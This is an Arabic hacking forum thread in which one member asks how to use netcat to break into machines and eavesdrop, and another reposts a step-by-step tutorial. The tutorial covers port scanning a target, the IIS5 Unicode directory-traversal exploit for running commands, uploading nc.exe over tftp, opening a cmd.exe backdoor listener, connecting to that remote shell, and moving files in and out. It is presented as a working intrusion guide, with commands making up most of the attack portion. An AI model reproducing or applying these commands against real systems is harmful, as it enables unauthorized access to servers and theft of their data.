ممكن شرح صوة و صورة لكيفة عمل اداة النت كات

extrem.harcer2 · منذ /11-19-2013, 06:57 PM

ممكن, لكيفة, النت, اداة, صورة

ممكن شرح صوة و صورة لكيفة عمل اداة النت كات

السلام عليكم ورحمة لله تعالى وبركاته

اخواني اريد شرح صوة صورة كيفية تعامل واستعمال
النت كات في اختراق الاجهوة واتنصت

وشكرا
ارجو المساعدة

اداة النت كات
لتحميل

المصدر: development-point - للمزيد تابع : مشاكل وحلول إختراق الأجهزة

ll;k avp w,m , w,vm g;dtm ulg h]hm hgkj ;hj

extrem.harcer2 · منذ /11-19-2013, 06:58 PM

ارجو المساعدة ........

سآرة · منذ /11-19-2013, 07:21 PM

البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها . النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP . ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور . لتحميل النت كات من هنا : اول شي بستعرض بعض اهم اوامر النت كات : -e specifies a program to exec after making/receiving a connection -g gateway source-routing hop points, up to 8 -G num

سآرة · منذ /11-19-2013, 07:22 PM

السلام عليكم ...

اليوم بنتكلم عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها .
البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها .
النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP .
ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .

لتحميل النت كات من هنا : http://www.members.lycos.co.uk/harl...hack/netcat.zip

اول شي بستعرض بعض اهم اوامر النت كات :

-e specifies a program to exec after
making/receiving a connection
-g gateway source-routing hop point[s], up to 8
-G num source-routing oiter: 4, 8, 12
-i secs delay interval for lines sent, ports scanned
-l listen mode for inbound connections
-n only accept numeric IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize
-s addr local source address
-t netcat will respond to telnet option negotiation
"this allows it to connect to a telnetd and
get past initial negotiation far enough to get
a login prompt from the server"
-u UDP connection mode
-v verbose mode
-w secs wait - timeout for connects
-z zero I/O mode [used for scanning]

For NT netcat, all of the above options exist, plus a few others.

-d detach - don't open a new DOS window
-L keep listening after the current session terminates

بنتكلم عن طريق الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :

-اولا البورت سكان :

تقدر تسوي سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200
او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200

192.168.1.90 هذا هو ايبي الجهاز او الموقع الي تبغي تسوي عليه بورت سكان .
طبعن علشان تطلع ايبي الموقع سو له ping ,. مثلا : ping www.drdeathx.com
الامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا ماصار تجاوب يروح على البورت الي بعده , اختصار للوقت .
1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .

شوفو النتئائج شو طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب حذالهم البورت مفتوح وله لا .

-ثانيا الاتصال بالبورتات :

مثلا عندنا موقع ونبغي نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع www.netcraft.com
بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80

الحين طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع شغال على ويندوز 2000 وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP

حلو هذي معلومات بتفيدنا في تحديد الهدف للاختراق .

الحين بنشتغل شغل اجمد , وبنبدا فالتطبيق العملي , بنخترق الموقع .
بنخلي النت كات يفتح لنا باك دور فالموقع . طبعن لازم نحمل النت كات على الموقع اول شي علشان يفتح لنا الباك دور . كيف ؟؟
بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه .

مثل ما تشوفون استخدمنا السكربت http://192.168.1.90/scripts/..%255c...md.exe?/c+dir+c
لاستعراض محتويات الدرايف C , عن طريق المجلد Scripts

وطلعت لنا النتائج : Documents and Settings , Inetpub , Program Files , WINNT
حلو , الحين بنرفع النت كات على سيرفر IIS
بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تبغي تعرف المزيد عنها .
نرجع الى موضوعنا :

شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination]
نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe
طبعن في اسكربتات اليونيكود بدل المسافه نكتب +
فتصير بهذا الشكل : http:///c+TFTP+-i+192.168.1.9+GET+nc.exe

في برنامج رائع اسمه TFTPD32 , يطلع لك اذا النت كات انرفع بنجاح للسيرفر
وصلة البرنامج : http://perso.wanadoo.fr/philippe.jo...tftpd32.272.zip
موقع البرنامج : http://tftpd32.jounin.net

الحين بنبدا فالشغل الحلو , بعد ما رفعنا النت كات وكل شي تمام , نبغي نخلي النت كات يفتح لنا باك دور (Back Door) .
علشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .

انزين الحين بنطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe

نشرح شوية الاوامر هذي الي كتبناها :
Nc : يخلي الويندوز يشغل النت كات nc.exe
-L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال
-p : لتحديد البورت الي بنتصنت عليه .
-d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله
-e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت .
طبعن نحن اخترنا الدوس cmd.exe

الحين بنكتب الامر في سكربت اليونيكود , طبعن بيكون بهذا الشكل : http:///c+nc+-L+-p+10001+-d+-e+cmd.exe

شوفو الصوره :

الحين تمام , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe

الحين يا دورنا , علشان نتصل من جهازنا على النت كات الي على السيرفر .

الحين مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 ,
بالامر nc –v –n 192.168.1.90 10001

دخلنا على ملف scripts الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^)
الحين تمام صار عندنا تحكم بعيد على السيرفر .

الحين نبغي ننقل الملفات بواسطة النت كات , كيف ؟؟
نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليونيكود , لكن ليش نحن خلاص تعاملنا الحين مع النت كات وهو افضل وعندنا اتصال خارجي معاه .

اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , ونبغي نسحبه , بنطبق هذا الامر : nc –l –p 1234 >hack.txt
1234 هذا هو البورت الي بنستخدمه في سحب الملف .

انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
عن طريق هذا الامر : nc 192.168.1.90 1234 <hack.txt , ^C

الحين تمام , نستعرض محتوايات المجلد بالامر dir , ونتاكد ان كل شي تمام وان الملف انرفع .
وعلشان نشغل الملف في السيرفر , نستخدم الامر ! , hack.txt!

مبروك عليك الاختراق , والعمليه تمت بنجاح ...

اتمنى ان يكون الموضوع حاز على اعجابكم , واي استفسار انا حاظر

تحياتي

منقووووووول للفائده

سآرة · منذ /11-19-2013, 07:24 PM